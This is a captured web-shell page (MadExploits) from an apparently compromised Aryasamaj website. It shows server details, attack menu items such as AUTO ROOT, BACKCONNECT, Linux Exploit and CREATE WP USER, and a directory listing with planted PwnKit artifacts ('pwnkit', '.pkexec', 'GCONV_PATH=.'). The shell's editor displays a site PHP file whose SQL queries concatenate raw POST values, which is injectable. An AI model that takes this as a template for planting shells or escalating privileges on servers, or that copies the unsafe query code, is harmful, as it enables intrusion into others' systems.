Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
thearyasamaj /
public_html /
mobile /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
flowplayer
[ DIR ]
drwxr-xr-x
mobilecommon
[ DIR ]
drwxr-xr-x
mobileimages
[ DIR ]
drwxr-xr-x
mobilejs
[ DIR ]
drwxr-xr-x
mp3player
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
appsgames.html
3.17
KB
-rw-r--r--
appsgames.php
4.16
KB
-rw-r--r--
comingevent.html
3.17
KB
-rw-r--r--
comingevent.php
7.6
KB
-rw-r--r--
comingevent_25-10-13.php
6.82
KB
-rw-r--r--
comingeventdetail.php
9.29
KB
-rw-r--r--
currentnewsdetail.php
8.17
KB
-rw-r--r--
disclaimer.html
3.17
KB
-rw-r--r--
disclaimer.php
2.79
KB
-rw-r--r--
downloadrigtone.php
228
B
-rw-r--r--
error_log
38.02
MB
-rw-r--r--
flowplayer.swf
4.05
KB
-rw-r--r--
index.php
7.84
KB
-rw-r--r--
index_25-10-13.php
6.67
KB
-rw-r--r--
index_29-10-12.html
3.17
KB
-rw-r--r--
index_31_oct.php
7.12
KB
-rw-r--r--
index_old.html
348
B
-rw-r--r--
policy.html
3.17
KB
-rw-r--r--
policy.php
2.79
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
ringtones.html
3.17
KB
-rw-r--r--
ringtones.php
4.7
KB
-rw-r--r--
ringtones_ds.php
3.89
KB
-rw-r--r--
ringtones_ds1.php
4.12
KB
-rw-r--r--
terms.html
3.18
KB
-rw-r--r--
terms.php
2.79
KB
-rw-r--r--
todaysevent.html
3.17
KB
-rw-r--r--
todaysevent.php
7.64
KB
-rw-r--r--
todaysevent_25-10-13.php
6.9
KB
-rw-r--r--
todayseventdetail.php
9.77
KB
-rw-r--r--
todayseventdetail_25-10-13.php
9.05
KB
-rw-r--r--
videos.html
3.17
KB
-rw-r--r--
videos.php
4.25
KB
-rw-r--r--
videosdetail.php
4.41
KB
-rw-r--r--
wallpapers.html
3.17
KB
-rw-r--r--
wallpapers.php
3.67
KB
-rw-r--r--
wallpapers_29-10-12.php
3.94
KB
-rw-r--r--
wallpapers_ds.php
3.96
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : currentnewsdetail.php
<?php session_start(); ?> <!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Aryasamaj</title> <link rel="stylesheet" href="css/mobile.css" type="text/css" /> <script type="text/javascript" src="mobilejs/common.js"></script> </head> <body> <div class="wrapper" data-role="page"><!-- wrapper start --> <div class="inner_wrapper"><!-- inner_wrapper start --> <div class="header"><!-- header start --> <div class="logo"> <a href="index.php"><img src="mobileimages/logo.png" alt="International Arya Mahasammelan 2012" /></a> </div> <h3>The Aryasamaj</h3> <div class="clr"></div> </div><!-- header end --> <div class="menu"><!-- menu start --> <ul> <li class="active"><a href="index.php" data-transition="slide" >Current News</a></li> <li><a href="comingevent.php">Coming Events</a></li> <li><a href="todaysevent.php">Today's Events</a></li> <li><a href="wallpapers.php">Wallpapers</a></li> <li><a href="ringtones.php">Ringtones</a></li> <li><a href="videos.php">Videos</a></li> <li><a href="appsgames.php">Apps & Games</a></li> <div class="clr"></div> </ul> </div><!-- menu end --> <div class="clr"></div> <div class="content"><!-- content start --> <div id="star-six"> <?php include("mobilecommon/aryasamaj-clientconnection.php"); if($_POST["storyid"] > 0) { $_SESSION['storyid']=$_POST["storyid"]; $topstoryid=$_POST["storyid"]; } else { $topstoryid=$_SESSION['storyid']; } if($_POST["storypage"]!="") { $_SESSION['storypage']=$_POST["storypage"]; $urlvalue=$_POST["storypage"]; } else { $urlvalue=$_SESSION['storypage']; } if(isset($_POST["btnNext"])) // Condition for the Next nd Previous Functionality create by vimal - 15-oct-12 { if($_POST["nextSeq"] > 0) { $selnews="SELECT * FROM arya_news WHERE news_feasequence='".$_POST["nextSeq"]."' AND news_featured='Yes'"; } } else if($_POST["prevSeq"] > 0) { $selnews="SELECT * FROM arya_news WHERE news_feasequence='".$_POST["prevSeq"]."' AND news_featured='Yes'"; } // End else { $selnews="SELECT * FROM arya_news WHERE news_id='".$topstoryid."' AND news_featured='Yes'"; } $qrynews=mysql_query($selnews); $fetchnews=mysql_fetch_array($qrynews); $newsid=$fetchnews["news_id"]; $newsSequence = $fetchnews["news_feasequence"]; $newstitle=stripslashes($fetchnews["news_title"]); $instid=$fetchnews['inst_id']; $instname=stripslashes(getFieldValue('inst_name','arya_institution','inst_id="'.$instid.'"')); $cnt_id=$fetchnews['cnt_id']; $state_id=$fetchnews['state_id']; $cntname=stripslashes(getFieldValue('cnt_name','arya_country','cnt_id="'.$cnt_id.'"')); $statename=stripslashes(getFieldValue('state_name','arya_state','state_id="'.$state_id.'"')); $newsdate=date("d M Y",strtotime($fetchnews['news_date'])); $newsshort=stripslashes($fetchnews['news_shorttext']); $newscontent=stripslashes($fetchnews['news_longtext']); $newsimage=$fetchnews['news_image']; $cityid=$fetchnews['city_id']; $cityName=stripslashes(getFieldValue('city_name','arya_city','city_id="'.$cityid.'"')); $newsphtalb=getFieldValue('pa_image','arya_photoalbum','news_id="'.$newsid.'"'); // Query code for the next and previous button functionality created by vimal 15-oct-12 $qrySelSequence = "SELECT news_id,news_feasequence FROM arya_news WHERE news_feasequence > ".$newsSequence." AND news_featured='Yes' ORDER BY news_feasequence ASC"; $qSelSequence = mysql_query($qrySelSequence); $fetchSeq = mysql_fetch_array($qSelSequence); $nextID = $fetchSeq["news_id"]; $nextSeq = $fetchSeq["news_feasequence"]; $qrySelSequencePrev = "SELECT news_id,news_feasequence FROM arya_news WHERE news_feasequence < ".$newsSequence." AND news_featured='Yes' ORDER BY news_feasequence DESC"; $qSelSequencePrev = mysql_query($qrySelSequencePrev); $fetchSeqPrev = mysql_fetch_array($qSelSequencePrev); $PrevID = $fetchSeqPrev["news_id"]; $PrevSeq = $fetchSeqPrev["news_feasequence"]; // End of Next And Previous Functionality ?> <div class="inner_con"><!--inner_con start--> <div> <div class="event_detail"><!--event_detail start--> <h2><?php echo $newstitle;?></h2> <div class="big_img"><!--img_div start--> <img src="http://www.thearyasamaj.com/aryaadmin/images/news/<?php echo $newsimage;?>" width="100%" alt="" title="" /> </div><!--img_div end--> <div class="detail_div"><!--cont_div start--> <p> <?php echo $newsdate;?> <?php echo $cityName;?> <br /> <?php echo $statename;?>, <?php echo $cntname;?> <span class="name"><?php echo $instname; ?></span> </p> </div><!--cont_div end--> <div class="clr"></div> </div><!--event_detail end--> <div class="detail_text"><!--detail_text start--> <p> <?php if($newscontent!=""){echo $newscontent;}?> </p> <form name="frmNextPrev" action="" method="post"> <!-- Next-Previous FUnctionality start - create by vimal on 15-oct-12 --> <div align="left"> <?php if($PrevSeq > 0) { $NewsSeq = $PrevSeq; ?> <div class="back_btn"> <input type="submit" name="btnPrev" value="Previous" class="back_right" /> <input type="hidden" name="prevSeq" value="<?php echo $NewsSeq; ?>" /> </div> <?php } ?> <?php if($nextSeq > 0) { $NewsSeq = $nextSeq; ?> <div class="back_btn"><input type="submit" name="btnNext" value="Next" class="back_right" /> <input type="hidden" name="nextSeq" value="<?php echo $NewsSeq; ?>" /> </div> <div class="clr"></div> <?php } ?> </div> </form> <!-- End --> </div><!--detail_text end--> <!--detail_text end--> </div> <div class="clr"></div> </div><!--inner_con start--> </div> </div><!-- content end --> <div class="footer"><!-- footer start --> <div> <div class="social_icons"><!-- social_icons start --> <div class="soc_link"> <a href="http://www.twitter.com/thearyasamaj" target="_blank" ><img src="mobileimages/twitter.png" alt="Click here to visit our twitter page" title="Click here to visit our twitter page" /></a> <a href="http://www.facebook.com/arya.samaj" target="_blank"><img src="mobileimages/facebook.png" alt="Click here to visit our facebook page" title="Click here to visit our facebook page" /></a> </div> <div class="gww"><a href="#">Powered by</a> <a href="http://www.jbm-group.com" target="_blank"><img src="../images/jbmlogo.png" alt="JBM Group" width="46" height="14" align="absbottom" title="JBM Group" /></a></div> <div class="fb_like" > <iframe src="https://www.facebook.com/plugins/like.php?href=http://www.facebook.com/arya.samaj" scrolling="no" frameborder="0" style="border:none; float:left; width:100%; height:24px; margin:-10px 0 0 0;"> </iframe> </div> <div class="clr"></div> </div><!-- social_icons end --> </div> <div class="btm_link"><!-- btm_link start --> <div class="con_link"> <a href="disclaimer.php" >Disclaimer</a> | <a href="policy.php">Privacy Poicy </a> | <a href="terms.php">Terms & Condiitons</a> </div> </div><!-- btm_link end --> </div><!-- footer end --> </div><!-- inner_wrapper end --> </div><!-- wrapper end --> </body> </html>
Close